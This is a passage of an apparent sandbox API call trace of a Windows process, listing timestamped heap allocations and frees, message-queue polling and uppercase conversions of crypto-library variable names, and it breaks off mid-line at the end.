[0077.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0077.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0077.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0077.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0077.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0077.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0077.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0077.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0077.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0077.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0077.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0077.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0077.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0077.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0077.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0077.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0077.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0077.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0077.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0077.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0077.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2c08 | out: hHeap=0x1780000) returned 1 [0077.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0077.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0077.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0077.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0077.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0077.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0077.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0077.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0077.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0077.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0077.183] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0077.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0077.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0077.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0077.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0077.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0077.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0077.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0077.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea958 [0077.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0077.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea958 | out: hHeap=0x1780000) returned 1 [0077.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0077.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0077.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0077.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0077.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0077.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0077.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0077.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0077.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0077.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0077.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0077.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea958 [0077.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0077.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea958 | out: hHeap=0x1780000) returned 1 [0077.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0077.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0077.184] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0077.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0077.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0077.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0077.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0077.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0077.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0077.184] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0077.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0077.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0077.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0077.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0077.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0077.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0077.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0077.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0077.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0077.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0077.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0077.185] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0077.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0077.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0077.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0077.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0077.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e88 [0077.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0077.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0077.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0077.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0077.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0077.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0077.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0077.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0077.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0077.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0077.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0077.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0077.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0077.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0077.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0077.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac740 | out: hHeap=0x1780000) returned 1 [0077.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0077.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0077.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0077.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0077.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0077.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0077.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0077.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0077.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0077.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0077.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0077.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0077.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eab80 | out: hHeap=0x1780000) returned 1 [0077.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0077.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0077.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0077.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0077.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0077.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0077.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0077.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0077.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0077.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0077.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0077.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0077.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0077.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0077.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0077.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0077.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0077.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0077.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0077.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0077.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0077.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0077.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0077.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0077.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0077.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0077.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0077.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9e90 [0077.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0077.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0077.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0077.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0077.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0077.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0077.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0077.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0077.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0077.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0077.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0077.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0077.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0077.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0077.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0077.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0077.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0077.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0077.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0077.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0077.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0077.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0077.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0077.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0077.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0077.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0077.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0077.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0077.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0077.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0077.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0077.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0077.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0077.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0077.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0077.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0077.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0077.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0077.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0077.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0077.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0077.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0077.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0077.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0077.191] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0077.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca760 [0077.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0077.191] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0077.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0077.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0077.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0077.191] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca658 [0077.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0077.191] PeekMessageW (in: lpMsg=0x144e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e734) returned 0 [0077.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0077.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0077.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0077.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0077.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0077.192] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0077.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0077.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c08 [0077.192] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0077.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6b8 [0077.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0077.192] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0077.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0077.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0077.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0077.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0077.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0077.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9818 [0077.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0077.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0077.192] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0077.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0077.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0077.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0077.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0077.192] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0077.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0077.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0077.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0077.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0077.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0077.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0077.193] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca598 [0077.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0077.193] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0077.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0077.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0077.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0077.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0077.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0077.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0077.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0077.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0077.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0077.193] RtlAllocateHeap 